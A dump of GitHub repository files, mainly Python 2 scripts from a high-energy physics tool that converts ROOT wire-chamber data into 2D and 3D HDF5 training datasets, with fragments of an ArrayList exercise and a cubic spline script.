elements\n # 对象方法、类方法、静态方法、对象属性、类属性前加两个下划线代表private私有\n\n __DEFAULT_COUNT = 10\n # 限制对象只可以动态增加这两个对象属性\n __slots__ = ['__elements', '__size'] # 对象属性前加两个下划线代表私有,外界不可访问\n\n def __init__(self):\n self.__elements = []\n self.__size = 0\n # print('init __size = %d'%(self.__size))\n\n # 类方法\n @classmethod\n def array_list(cls):\n return cls() # 也可以 return ArrayList()\n\n # 对象方法\n def add(self, obj):\n self.__elements.append(obj) # python 中不能使用list[idx] = xxx来添加元素,否则会报越界错误\n self.__size += 1\n 
print(self.__elements, self.__size)\n\n def remove_at_index(self, idx):\n for i in range(idx, self.__size - 1):\n print(i)\n self.__elements[idx] = self.__elements[idx + 1]\n del self.__elements[self.__size - 1] # 目前只想到这个方法,python貌似不支持设置为null\n # self.__elements[self.__size - 1] = None # 不能使用None,None也是对象\n self.__size -= 1\n print(self.__elements)\n\n def remove(self, obj):\n idx = self.index_of(obj) # 之所以不用contains方法,因为避免先调用contains、再调用index_of而消耗性能\n if idx == -1:\n return\n self.remove_at_index(idx)\n\n def pop(self):\n del self.__elements[self.__size - 1]\n # self.__elements[self.__size - 1] = None\n self.__size -= 1\n\n def object_at_index(self, idx):\n return self.__elements[idx]\n\n def index_of(self, obj):\n for i in range(0, self.__size):\n if self.__elements[i] == obj:\n return i\n return -1\n\n def contains(self, obj):\n return self.index_of(obj) != -1\n\n def is_empty(self):\n return self.__size == 0\n\n def clear(self):\n self.__elements = []\n\n def size(self):\n return self.__size\n\n\n# list = ArrayList()\n# list.add(12)\n# print(list.elements)\n# list.elements = [2, 4]\n# print(list.elements)\n\nlist = ArrayList.array_list()\n# list.__elements = [999]\n# print(list.__elements)\n\nlist.add(12)\nprint(list)\nlist.add(24)\nlist.remove_at_index(0)\nlist.add(666)\nlist.add(888)\n\nprint(list.index_of(666))\nprint(list.object_at_index(2))\nprint(list.contains(24))\nprint (list.is_empty())\n" } ]
5
UTA-HEP-Computing/DLTool
https://github.com/UTA-HEP-Computing/DLTool
90a6c92d14045efaf5bc449a3fb4c248677d53d4
b6510df248d068ca394be8242361bb1d154284bd
d35ed20f3c7c8323dd5066060a5f9f022fbc6e45
refs/heads/master
2020-06-16T10:03:02.709563
2016-11-30T00:30:08
2016-11-30T00:30:08
75,117,064
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6911764740943909, "alphanum_fraction": 0.7426470518112183, "avg_line_length": 33, "blob_id": "160490d64a3b75af9513d76a7f6caae84af28515", "content_id": "09593daf01f8880b5bcb97770935ee18c8431319", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 136, "license_type": "no_license", "max_line_length": 93, "num_lines": 4, "path": "/README.md", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "# DLTool\n3D/2D h5 files\n####How to Run###\npython ProcessRootFile_WireCell.py /input-directory-of-root-files/ output-2d-H5 output-3d-H5\n" }, { "alpha_fraction": 0.5910722017288208, "alphanum_fraction": 0.6294302344322205, "avg_line_length": 22.712766647338867, "blob_id": "875a293fc40a4948424abf3fe09af71b9d68c68b", "content_id": "0f92d34d8b267ad9a82ca03fc88e26fcdedc2bb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4458, "license_type": "no_license", "max_line_length": 133, "num_lines": 188, "path": "/ProcessRootFile_WireCell.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "import time\nimport ROOT\nimport rootpy\nimport root_numpy\nimport numpy\nimport math\nimport sys\nimport os\nimport glob\nfrom SparseTensorDataSet import *\n\nfrom scipy import misc as m\nfrom WireDataUtils import *\nfrom subprocess import call\nimport multiprocessing \n\ndef preprocess(X):\n return X[:2,:,0:4096] \n\ndef ProcessEvents(NEvents,infile,outfile2D,outfile3D,Offset=0):\n \n bins3D=[240,240,4096]\n #bins2D=[480,4096]\n\n # ReadEvents\n f=ROOT.TFile(infile)\n t=f.Get(\"wiredump/anatree\")\n if NEvents<=0:\n NEvents=t.GetEntries()\n \n EventList=range(0,NEvents)\n\n\n #Read one event.\n [example,Attributes]=ReadADCWire(t,[EventList[0]],NPlanes=2,samples=4500)\n\n X=preprocess(example[0])\n image_shape= X.shape\n assert image_shape == (2, 240, 4096)\n\n dtype = 'float16' # 'float16' # Half-precision should be enough.\n compression = 'gzip' #'gzip'\n chunksize = 1 # We use chunksize=1 because we don't know how many events are in src file.\n chunkshape = (chunksize,) + image_shape\n\n h5FileName2D=outfile2D\n h5out2D= h5py.File(h5FileName2D+\".2d.h5\",\"w\")\n h5FileName3D=outfile3D\n #h5out3D= h5py.File(h5FileName3D+\".3d.h5\",\"w\")\n \n #file to save 3D images\n #fileout3D=os.path.basename(infile)+\".3d.h5\"\n f_3D=open_file(h5FileName3D+\".3d.h5\",\"w\")\n #images3D.Writeh5(h5out3D,\"images3D\")\n #f.close()\n \n\n N=len(EventList)\n \n # Initialize data sets.\n dsets = {}\n\n # Each event contains the following attributes.\n attributes = Attributes[0].keys()\n for attr in attributes:\n \n dsets[attr] = h5out2D.create_dataset(attr, (N,), dtype='float32')\n\n # Each event is an image of image_shape.\n dsets['features'] = h5out2D.create_dataset('features', (N,)+image_shape, chunks=chunkshape, dtype=dtype, compression=compression)\n #getting 3D sparse matrix for 3D imaging\n images3D=SparseTensorDataSet(bins3D,unbinned=True)\n \n for EventI in xrange(0,N):\n \n [events,Attributes]=ReadADCWire(t,[EventList[EventI]],NPlanes=2,samples=4500)\n \n event=events[0]\n dsets['features'][EventI] = preprocess(event)\n\n for attr in Attributes[0]:\n dsets[attr][EventI] = Attributes[0][attr]\n \n images3D.C.append(np.array([t.simide_x,t.simide_y,t.simide_z]).transpose())\n images3D.V.append(np.array(t.simide_numElectrons))\n \n Cs=[]\n Vs=[]\n MaxSamples=4096\n\n images3D.Writeh5(f_3D,\"images3D\")\n\n f.Close()\n\n h5out2D.close()\n 
f_3D.close()\n #h5out3D.close()\n\n return True\n\n\n################################################### \n\nInputDir=sys.argv[1]\n\nif len(sys.argv)>2:\n OutputDir2D=sys.argv[2]\nelse:\n OutputDir2D=\"./\"\n\nif OutputDir2D[:-1]!=\"/\":\n OutputDir2D=OutputDir2D+\"/\"\n\nif len(sys.argv)>3:\n OutputDir3D=sys.argv[3]\nelse:\n OutputDir3D=\"./\"\n\nif OutputDir3D[:-1]!=\"/\":\n OutputDir3D=OutputDir3D+\"/\"\n\n\nprint \"Reading Directory:\",InputDir\nprint \"Output Dir 2d:\", OutputDir2D\nprint \"Output Dir 3d:\", OutputDir3D\n\n#Make the directories\n\nif not os.path.exists(OutputDir2D):\n os.makedirs(OutputDir2D)\nif not os.path.exists(OutputDir3D):\n os.makedirs(OutputDir3D)\n\nOffset=0\n\nif len(sys.argv)>4:\n Offset=max(long(sys.argv[4]),Offset)\n\nNEvents=0\n\nif len(sys.argv)>4:\n if long(sys.argv[4])>0:\n NEvents=long(sys.argv[4])\n\nprint \"NEvents per file: \",NEvents\nprint \"Offset: \",Offset\n\nfiles = glob.glob(InputDir + '/*/*/WireDump_*.root')\nprint 'Found %d files.' % len(files)\n\n\ndef wrapper(filename):\n basename = os.path.basename(filename)\n fout = '/' + basename.split(\".\")[-2]\n fout = fout.split(\"_\")[-1]\n # Construct name from Docker Subdirectories\n dockername = filename.split(\"/\")[-2]\n particlename = filename.split(\"/\")[-3]\n fout2d = OutputDir2D +particlename+\"_\"+fout + \"-\" + dockername\n fout3d = OutputDir3D +particlename+\"_\"+fout + \"-\" + dockername\n\n\n print \"2D File: \",fout2d, \"3D File: \",fout3d\n \n if not os.path.isfile(fout+\".h5\"):\n output=ProcessEvents(NEvents,filename,fout2d,fout3d,\n Offset=Offset)\n pass\n else:\n print \"Exists. Skipping.\",\n\n print \"Done.\"\n return\n\nnum_threads=20\n\n#wrapper(files[0])\n\ntic = time.clock()\ntry:\n pool = multiprocessing.Pool(num_threads)\n pool.map(wrapper, files)\nexcept:\n print \"Error\"\nfinally:\n pool.close()\n pool.join()\nprint time.clock() - tic\n" }, { "alpha_fraction": 0.5269439220428467, "alphanum_fraction": 0.5362942814826965, "avg_line_length": 27.921709060668945, "blob_id": "998901c93c0bf071a8d59d8349a448373bba7238", "content_id": "965febfcbc1bca210a290e19984fdef53445ea42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8128, "license_type": "no_license", "max_line_length": 127, "num_lines": 281, "path": "/SparseTensorDataSet.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "from SparseNDArray import *\nfrom tables import *\nfrom scipy.sparse import find\nimport numpy as np\nimport h5py\n\nclass SparseTensorDataSet:\n def __init__(self,shape=(), default=0, unbinned=False,dtype=\"float32\"):\n self.unbinned=unbinned\n self.shape=tuple(shape)\n self.__default = default #default value of non-assigned elements\n self.ndim = len(shape)\n self.dtype = dtype\n self.C = [] # This will hold the sparse ND arrays\n self.V = [] # This will hold the sparse ND arrays\n\n def append(self,Coordinates,Values):\n Cs=[]\n Vs=[]\n \n for C,V in zip(Coordinates,Values):\n Cs.append(tuple(C))\n Vs.append(V)\n \n self.C.append(Cs)\n self.V.append(Vs)\n\n def convertToBinned(self):\n ## Not completed... need to flatten, use find, and unflatten, and store in self.C,self.V. 
Requires reindexing.\n N=self.len()\n\n for i in xrange(B):\n out,binedges=self.histogram(i,bins)\n find(out)\n\n self.binedges=binedges\n \n \n def sparse(self,i):\n a=sparray(self.shape,default=self.__default, dtype=self.dtype)\n\n for C,V in zip(self.C[i],self.V[i]):\n a[C]=V\n\n return a\n\n def histogram(self,i,bins=False):\n if not (isinstance(bins,list) or isinstance(bins,tuple) ):\n bins=self.shape\n # returns histogram and bin edges\n return np.histogramdd(self.C[i],bins=list(bins),weights=self.V[i])\n\n def histogramAll(self,range=False,bins=False):\n if not (isinstance(bins,list) or isinstance(bins,tuple) ):\n bins=self.shape\n if range:\n N=range[1]-range[0]\n else:\n N=self.len()\n out=np.zeros((N,)+tuple(bins))\n\n if not range:\n range=xrange(N)\n else:\n range=xrange(range[0],range[1])\n\n for i in range:\n out[i],binedges=self.histogram(i,bins)\n \n return out,binedges\n \n # This only makes sense if the coordinates are integers\n def dense(self,i):\n if self.unbinned:\n return self.histogram(i)[0]\n \n a=np.zeros((1,)+self.shape,dtype=self.dtype)\n\n for C,V in zip(self.C[i],self.V[i]):\n a[tuple(C)]=V\n\n return a\n\n def denseAll(self,range=[]):\n if self.unbinned:\n return self.histogramAll(range)[0]\n\n if len(range)>0:\n Start=range[0]\n Stop=range[1]\n else:\n Start=0\n Stop=len(self.C)\n\n a=np.zeros((Stop-Start,)+tuple(self.shape),dtype=self.dtype)\n \n for i in xrange(Start,Stop):\n for C,V in zip(self.C[i],self.V[i]):\n try:\n a[i-Start][tuple(C)]=V\n except:\n print \"Reached End of Sample.\"\n\n return a\n \n \n def Writeh5(self,h5file,name,range=[]):\n root = h5file.create_group(\"/\",name,name)\n FILTERS = Filters(complib='zlib', complevel=5)\n\n if self.unbinned:\n CT=h5file.create_vlarray(root,\"C\", Float32Atom(shape=len(self.shape)),\"\",filters=FILTERS)\n else:\n CT=h5file.create_vlarray(root,\"C\", Int32Atom(shape=len(self.shape)),\"\",filters=FILTERS)\n VT=h5file.create_vlarray(root,\"V\", Float32Atom(),\"\",filters=FILTERS) \n h5file.create_array(root,\"shape\",self.shape)\n h5file.create_array(root,\"unbinned\",[int(self.unbinned)])\n \n if len(range)>0:\n Start=range[0]\n Stop=range[1]\n else:\n Start=0\n Stop=len(self.C)\n\n for i in xrange(Start,Stop):\n CT.append(self.C[i])\n VT.append(self.V[i])\n\n def Readh5(self,f,name,range=[]):\n self.shape=np.array(f[name][\"shape\"])\n self.unbinned=bool(f[name][\"unbinned\"][0])\n if len(range)>0:\n Start=range[0]\n Stop=range[1]\n self.C=f[name][\"C\"][Start:Stop]\n self.V=f[name][\"V\"][Start:Stop]\n\n else:\n self.C=f[name][\"C\"]\n self.V=f[name][\"V\"]\n\n def Readh5Files(self,filelist,name):\n for filename in filelist:\n f=h5py.File(filename,\"r\")\n self.shape=np.array(f[name][\"shape\"])\n\n try:\n self.C=np.concatenate(self.C,f[name][\"C\"])\n # self.V=np.concatenate(self.V,f[name][\"V\"])\n self.V+=list(self.V,f[name][\"V\"])\n except:\n self.C=np.array(f[name][\"C\"])\n self.V=list(f[name][\"V\"])\n f.close()\n\n def Readh5Files2(self,filelist,name):\n for filename in filelist:\n f=h5py.File(filename,\"r\")\n self.shape=np.array(f[name][\"shape\"])\n\n try:\n self.C=f[name][\"C\"]\n # self.V=np.concatenate(self.V,f[name][\"V\"])\n self.V+=f[name][\"V\"]\n except:\n self.C=np.array(f[name][\"C\"])\n self.V=list(f[name][\"V\"])\n f.close()\n\n \n def FromDense(self,A,Clear=False):\n if Clear:\n self.C=[]\n self.V=[]\n for a in A:\n X,Y,V=find(a)\n C=np.array([X,Y])\n C=C.transpose()\n \n self.C.append(tuple(C))\n self.V.append(V)\n\n def AppendFromDense(self,a):\n\n X,Y,V=find(a)\n 
C=np.array([X,Y])\n C=C.transpose()\n \n self.C.append(tuple(C))\n self.V.append(V)\n\n\n \n def len(self):\n try:\n N=len(self.C)\n except:\n N=self.C.shape[0]\n return N\n\n \n def DenseGenerator(self,BatchSize,Wrap=True):\n Done=False\n N=self.len()\n while not Done:\n for i in xrange(0,N-BatchSize,BatchSize): # May miss some Examples at end of file... need better logic\n yield self.denseAll([i,i+BatchSize])\n Done=not Wrap\n \nif __name__ == '__main__':\n # Main\n import h5py\n import time\n\n shape=(10000,10,360)\n density=0.1\n batchsize=100\n \n N_Examples=shape[0]\n N_Vals=np.prod(shape)\n \n print \"Testing with tensor size\", shape, \" and density\",density,\".\"\n\n # Generate Some Sparse Data\n start=time.time()\n Vals=np.array(np.random.random(int(N_Vals*density)),dtype=\"float32\")\n Zs=np.zeros(N_Vals-Vals.shape[0],dtype=\"float32\")\n Train_X=np.concatenate((Vals,Zs))\n np.random.shuffle(Train_X)\n Train_X=Train_X.reshape(shape)\n print \"Time Generate Sparse Data (into a Dense Tensor):\",time.time()-start\n\n # Now Create the sparse \"Tensor\"\n X=SparseTensorDataSet(Train_X.shape[1:])\n \n # Test making the data sparse. (Only works for 2d right now)\n start=time.time()\n X.FromDense(Train_X)\n print \"Time to convert to Sparse:\",time.time()-start\n\n print \"Sparsity Achieved: \",float(sum(map(len,X.C)))/N_Vals\n\n # Write to File\n start=time.time()\n f=open_file(\"TestOut.h5\",\"w\")\n X.Writeh5(f,\"Data\")\n f.close()\n print \"Time to write out:\",time.time()-start\n \n # Read back\n start=time.time()\n XX=SparseTensorDataSet(Train_X.shape[1:])\n f=h5py.File(\"TestOut.h5\",\"r\")\n XX.Readh5(f,\"Data\")\n f.close()\n print \"Time to read back:\",time.time()-start\n \n # Try to reconstruct the original data\n start=time.time()\n XXX=XX.denseAll()\n print \"Time to convert to Dense:\",time.time()-start\n \n # Test\n print\n NValues=np.prod(Train_X.shape)\n T=Train_X==XXX\n NGood=np.sum(T)\n print \"Number of non-matching values\",NValues-NGood ,\"/\",NValues\n\n print \"The Difference:\"\n print XXX[np.where(T==False)]-Train_X[np.where(T==False)]\n print \"Average difference of mismatch terms:\", np.sum( XXX[np.where(T==False)]-Train_X[np.where(T==False)])/(NValues-NGood)\n\n start=time.time()\n print \"Generator batchsize:\",batchsize\n for D in XX.DenseGenerator(batchsize,False):\n print \".\",\n\n print\n print \"Time to run generator:\",time.time()-start\n\n" }, { "alpha_fraction": 0.5505473017692566, "alphanum_fraction": 0.5676110982894897, "avg_line_length": 28.81730842590332, "blob_id": "08ae34e06f959e43b5b73b8375aefc1da38fcea5", "content_id": "435f970dda7f38e6ce9321a36c997f07fd0a79ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3106, "license_type": "no_license", "max_line_length": 136, "num_lines": 104, "path": "/WireDataUtils.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "import numpy\nimport numpy as np\nimport h5py\nimport math\nimport ROOT\n\ndef DownSample(Data,factor,Nx,Ny,sumabs=False):\n if factor==0:\n return np.reshape(Data,[Nx,Ny]),Ny\n\n # Remove entries at the end so Down Sampling works\n NyNew=Ny-Ny%factor\n Data1=np.reshape(Data,[Nx,Ny])[:,0:NyNew]\n \n # DownSample \n if sumabs:\n a=abs(Data1.reshape([Nx*NyNew/factor,factor])).sum(axis=1).reshape([Nx,NyNew/factor])\n else:\n a=Data1.reshape([Nx*NyNew/factor,factor]).sum(axis=1).reshape([Nx,NyNew/factor])\n\n return a,NyNew\n\ndef GetXWindow(Data,i,BoxSizeX):\n return Data[:,i:i+BoxSizeX]\n\n\ndef 
ScanWindow(Data,BoxSizeX=256,Nx=240,Ny=4096):\n\n NyNew=Ny\n #Scan the Window\n b=np.array([0]*(NyNew-BoxSizeX))\n\n for i in xrange(0,NyNew-BoxSizeX):\n b[i]=GetXWindow(Data,i,BoxSizeX).clip(0,99999999999).sum()\n\n #Find the Window with max Energy/Charge\n BoxStart=b.argmax()\n MaxSum=b[BoxStart]\n\n #Store the window\n Box=Data[:,BoxStart:BoxStart+BoxSizeX]\n\n return Box,BoxStart,MaxSum\n\n\ndef ReadADCWire(t,EventList=[0],NPlanes=2,samples=4500):\n\n Events=[]\n Attributes=[]\n\n for NEvent in EventList:\n\n if (NEvent>-1):\n t.GetEntry(NEvent)\n\n x=numpy.array(t.WireADC)\n a_size = t.geant_list_size \n #print a_size\n if NPlanes<3:\n y=numpy.pad(x,(0,t.nWires/NPlanes*samples),mode='constant')\n else:\n y=x\n\n z=numpy.reshape(y,[NPlanes+1,t.nWires/NPlanes,samples])\n Events+=[z]\n #Creat Dictionary\n AA={}\n\t#getting information for the line equation\n #print \"out\"\n# print numpy.array(t.StartPointx)[0]\n #if (numpy.array(t.process_primary)[a_size] == 0) and (numpy.array(t.pdg)[a_size] == 11 or numpy.array(t.pdg)[a_size] == 13)\n for PrimaryI in xrange(0,a_size):\n if t.process_primary[PrimaryI]==1:\n break\n\n #print \"PrimaryI:\", PrimaryI\n \n #print \"xi \",xi\n\n # [xi,yi,zi]= [t.StartPointx[PrimaryI]-t.EndPointx[PrimaryI],\n # t.StartPointy[PrimaryI]-t.EndPointy[PrimaryI],\n # t.StartPointz[PrimaryI]-t.EndPointz[PrimaryI]]\n \n AA[\"Track_length\"]= numpy.array(t.Track_length)[PrimaryI] #<---- here is now computed in WireDump\n AA[\"pdg\"] = numpy.array(t.pdg)[PrimaryI]\n AA[\"Eng\"] = numpy.array(t.Eng)[PrimaryI]\n AA[\"Px\"] = numpy.array(t.Px)[PrimaryI]\n AA[\"Py\"] = numpy.array(t.Py)[PrimaryI]\n AA[\"Pz\"] = numpy.array(t.Pz)[PrimaryI] \n#Creat Dictionary\n #AA={}\n\n# AA[\"Foo\"]=t.bar\n\t AA[\"enu_truth\"]=numpy.array(t.enu_truth)\n AA[\"lep_mom_truth\"]=numpy.array(t.lep_mom_truth)\n AA[\"mode_truth\"]=numpy.array(t.mode_truth)\n #AA[\"Track_length\"]=math.sqrt(math.pow((xs-x_i),2)+math.pow((ys-y_i),2)+math.pow((zs-z_i),2))\n Attributes+=[AA]\n\n return [Events,Attributes]\n\n\n\n#def LineEquation_point(\n\n\n\n \n" }, { "alpha_fraction": 0.5191272497177124, "alphanum_fraction": 0.5627656579017639, "avg_line_length": 26.34883689880371, "blob_id": "2c08bde183d1e70325e4d11f9346f9110561aa4c", "content_id": "137e42db68e449ceb81dc7dd0d7b613631aa4e09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3529, "license_type": "no_license", "max_line_length": 134, "num_lines": 129, "path": "/ProcessWireCell.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "from ROOT import *\nfrom root_numpy import hist2array\nfrom SparseTensorDataSet import *\nimport os,sys\n\ndef Plot3DTrack(X,Y,Z,V):\n import matplotlib.pyplot as plt\n import plotly.plotly as py\n from mpl_toolkits.mplot3d import Axes3D\n\n fig = plt.figure()\n fig,ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X,Y,Z,c=V)\n fig.show()\n return ax\n\ndef PlotSparseTensor(T,i):\n return Plot3DTrack(T.C[i][0:100,0],\n T.C[i][0:100,1],\n T.C[i][0:100,2],\n T.V[i][0:100])\n\n\ndef ProcessRootFile(filein=\"WireDump_3D_electron_1462146937.root\",fileout=False,N_Max=-1,Sparse2D=False):\n Rf=TFile.Open(filein)\n t=Rf.Get(\"wiredump/anatree\")\n\n bins3D=[240,240,4096]\n bins2D=[480,4096]\n\n N=t.GetEntries()\n \n if N_Max>0:\n N=min(N,N_Max)\n\n images3D=SparseTensorDataSet(bins3D,unbinned=True)\n if Sparse2D:\n images2D=SparseTensorDataSet(bins2D,unbinned=False)\n else:\n d=np.zeros((N,480,4096))\n \n for i in xrange(N):\n 
t.GetEntry(i)\n print i,\",\",\n sys.stdout.flush()\n\n images3D.C.append(np.array([t.simide_x,t.simide_y,t.simide_z]).transpose())\n images3D.V.append(np.array(t.simide_numElectrons))\n\n Cs=[]\n Vs=[]\n\n MaxSamples=4096\n\n # if Sparse2D:\n # d=np.zeros((t.raw_nChannel,MaxSamples))\n # for j in xrange(t.raw_nChannel):\n # h=t.raw_wf[j]\n # d[j]=hist2array(h)[:MaxSamples]\n\n # images2D.AppendFromDense(d)\n # else:\n # for j in xrange(t.raw_nChannel):\n # h=t.raw_wf[j]\n # d[i][j]=hist2array(h)[:MaxSamples]\n\n if not fileout:\n fileout2D=os.path.basename(filein)+\".2d.h5\"\n fileout3D=os.path.basename(filein)+\".3d.h5\"\n\n if Sparse2D:\n f=open_file(fileout2D,\"w\")\n images2D.Writeh5(f,\"images2D\")\n f.close()\n else:\n f=h5py.File(fileout2D,\"w\")\n dset = f.create_dataset(\"images2D\", (N,480,4096),compression=\"gzip\")\n dset[...]=d\n f.close()\n \n f=open_file(fileout3D,\"w\")\n images3D.Writeh5(f,\"images3D\")\n f.close()\n\n #return t,Rf,images2D,images3D\n\nif __name__ == '__main__':\n # Main\n\n t=ProcessRootFile(Sparse2D=False,N_Max=10)\n \n #PlotSparseTensor(images,2)\n\n\n images3D=SparseTensorDataSet()\n \n # f=h5py.File(\"celltree_SimChannel_Raw.root.3d.h5\",\"r\")\n # images3D.Readh5(f,\"images3D\")\n # f.close()\n #images2D=SparseTensorDataSet()\n #f=h5py.File(\"celltree_SimChannel_Raw.root.2d.h5\",\"r\")\n #images2D.Readh5(f,\"images2D\")\n # f.close()\n\n\n# f=h5py.File(\"celltree_SimChannel_Raw.root.2d.h5\",\"r\")\n# images2D=np.array(f[\"images2D\"])\n# f.close()\n\n # hAll1=images1.histogramAll()\n \n # NValues=np.prod(images.shape)*images.len()\n # T=hAll[0]==hAll1[0]\n # NGood=np.sum(T)\n # print \"Number of non-matching values\",NValues-NGood ,\"/\",NValues\n\n # print \"The Difference:\"\n # print hAll[0][np.where(T==False)]-hAll1[0][np.where(T==False)]\n # print \"Average difference of mismatch terms:\", np.sum( hAll[0][np.where(T==False)]-hAll1[0][np.where(T==False)])/(NValues-NGood)\n\n\n # for k in xrange(0,4096): #h.GetNbinsX()+1):\n# V=h.GetBinContent(k+1)\n# if V!=0.:\n# Cs.append((j,k))\n # Vs.append(V)\n\n# images2D.C.append(np.array(Cs))\n# images2D.V.append(np.array(Vs))\n\n" }, { "alpha_fraction": 0.603939414024353, "alphanum_fraction": 0.625151515007019, "avg_line_length": 22.076923370361328, "blob_id": "676fdfa3f0e71f7c464f4b2c9a8649c981c448f7", "content_id": "c16e3915d6a8c45e58eab71cca8bf52ffc8fdc16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3300, "license_type": "no_license", "max_line_length": 131, "num_lines": 143, "path": "/ProcessRootFile.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "import time\nimport ROOT\nimport rootpy\nimport root_numpy\nimport numpy\nimport math\nimport sys\nimport os\nimport glob\n\nfrom scipy import misc as m\nfrom WireDataUtils import *\nfrom subprocess import call\nimport multiprocessing \n\ndef preprocess(X):\n return X[:2,:,0:4096] \n\ndef ProcessEvents(NEvents,infile,outfile,Offset=0):\n # ReadEvents\n f=ROOT.TFile(infile)\n t=f.Get(\"wiredump/anatree\")\n if NEvents<=0:\n NEvents=t.GetEntries()\n \n EventList=range(0,NEvents)\n\n #Read one event.\n [example,Attributes]=ReadADCWire(t,[EventList[0]],NPlanes=2,samples=4500)\n\n X=preprocess(example[0])\n image_shape= X.shape\n assert image_shape == (2, 240, 4096)\n\n dtype = 'float16' # 'float16' # Half-precision should be enough.\n compression = 'gzip' #'gzip'\n chunksize = 1 # We use chunksize=1 because we don't know how many events are in src file.\n chunkshape = 
(chunksize,) + image_shape\n\n h5FileName=outfile\n h5out= h5py.File(h5FileName+\".h5\",\"w\")\n N=len(EventList)\n \n # Initialize data sets.\n dsets = {}\n\n # Each event contains the following attributes.\n attributes = Attributes[0].keys()\n for attr in attributes:\n dsets[attr] = h5out.create_dataset(attr, (N,), dtype='float32')\n\n # Each event is an image of image_shape.\n dsets['features'] = h5out.create_dataset('features', (N,)+image_shape, chunks=chunkshape, dtype=dtype, compression=compression)\n \n for EventI in xrange(0,N): \n [events,Attributes]=ReadADCWire(t,[EventList[EventI]],NPlanes=2,samples=4500)\n \n event=events[0]\n dsets['features'][EventI] = preprocess(event)\n\n for attr in Attributes[0]:\n dsets[attr][EventI] = Attributes[0][attr]\n\n f.Close()\n\n h5out.close()\n\n return True\n\n\n################################################### \n\nInputDir=sys.argv[1]\n\nif len(sys.argv)>2:\n OutputDir=sys.argv[2]\nelse:\n OutputDir=\"./\"\n\nif OutputDir[:-1]!=\"/\":\n OutputDir=OutputDir+\"/\"\n\nprint \"Reading Directory:\",InputDir\nprint \"Output Dir:\", OutputDir\n\n#Make the directories\n\nif not os.path.exists(OutputDir):\n os.makedirs(OutputDir)\n\nOffset=0\n\nif len(sys.argv)>4:\n Offset=max(long(sys.argv[4]),Offset)\n\nNEvents=0\n\nif len(sys.argv)>3:\n if long(sys.argv[3])>0:\n NEvents=long(sys.argv[3])\n\nprint \"NEvents per file: \",NEvents\nprint \"Offset: \",Offset\n\nfiles = glob.glob(InputDir + '/*/*/wire_dump*.root')\nprint 'Found %d files.' % len(files)\n\n\ndef wrapper(filename):\n basename = os.path.basename(filename)\n fout = '/' + basename.split(\".\")[-2]\n fout = fout.split(\"_\")[-1]\n # Construct name from Docker Subdirectories\n dockername = filename.split(\"/\")[-2]\n particlename = filename.split(\"/\")[-3]\n fout = OutputDir +particlename+\"_\"+fout + \"-\" + dockername\n\n print fout,\n \n if not os.path.isfile(fout+\".h5\"): \n output=ProcessEvents(NEvents,filename,fout,\n Offset=Offset)\n pass\n else:\n print \"Exists. Skipping.\",\n\n print \"Done.\"\n return\n\nnum_threads=48\n\n#wrapper(files[0])\n\ntic = time.clock()\ntry:\n pool = multiprocessing.Pool(num_threads)\n pool.map(wrapper, files)\nexcept:\n print \"Error____\"\nfinally:\n pool.close()\n pool.join()\nprint time.clock() - tic\n" } ]
6
MrSkl1f/CA
https://github.com/MrSkl1f/CA
8af3750014971caffbd9fd51b9952073175186a7
27fd28a65499e7792881f980de04f34797f24326
d611ecb60c73ed61ec26ba943b0040076a0bb18f
refs/heads/master
2022-08-20T12:19:34.270532
2020-05-23T14:42:45
2020-05-23T14:42:45
263,736,493
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4944238066673279, "alphanum_fraction": 0.5183218121528625, "avg_line_length": 32.64285659790039, "blob_id": "9589ee20add78273cf54452460cfd876b370e768", "content_id": "0c156337e092faccced3de02bf3c2f0c6461a8ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 124, "num_lines": 56, "path": "/ThirdLab/3labMain.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "def f(x):\n return x ** 3\n\ndef get_table(xStart, step, amount):\n xMas = [xStart + step*i for i in range(amount)]\n yMas = [f(x) for x in xMas]\n return xMas, yMas\n\ndef interval(xMas, yMas, x):\n for i in range(1, len(xMas)):\n if xMas[i - 1] <= x < xMas[i]:\n return i\n return len(xMas)\n\ndef spline(xMas, yMas, step, xNeed): \n eta = [0, 0, 0]\n ksi = [0, 0, 0]\n\n # нахождение eta и ksi\n for i in range(2, len(xMas)):\n a = step\n b = -4 * step\n d = step\n f = -3 * ((yMas[i] - yMas[i - 1]) / step - (yMas[i - 1] - yMas[i - 2]) / step)\n eta.append(d / (b - a * eta[i]))\n ksi.append((a * ksi[i] + f) / (b - a * eta[i]))\n\n ci = [0] * (len(xMas) + 1)\n # определяем коэффы ci\n for i in range(len(xMas) - 1, 1, -1):\n ci[i] = eta[i + 1] * ci[i + 1] + ksi[i + 1]\n\n # определяем коэффы ai bi ci, получаем систему уравнений\n ai = [0 if i < 1 else yMas[i - 1] for i in range(len(xMas))]\n bi = [0 if i < 1 else ((yMas[i] - yMas[i - 1]) / step) - (step / 3 * (ci[i + 1] + 2 * ci[i])) for i in range(len(xMas))]\n di = [0 if i < 1 else (ci[i + 1] - ci[i]) / (3 * step) for i in range(len(xMas))]\n\n hi = xNeed - xMas[pos - 1]\n res = ai[pos] + bi[pos] * hi + ci[pos] * hi ** 2 + di[pos] * hi ** 3\n return res\n\nif __name__ == \"__main__\":\n xStart = float(input(\"Input beginning value of x: \"))\n xStep = float(input(\"Input step for x value: \"))\n xCount = int(input(\"Input amount of dots: \"))\n\n xMas, yMas = get_table(xStart, xStep, 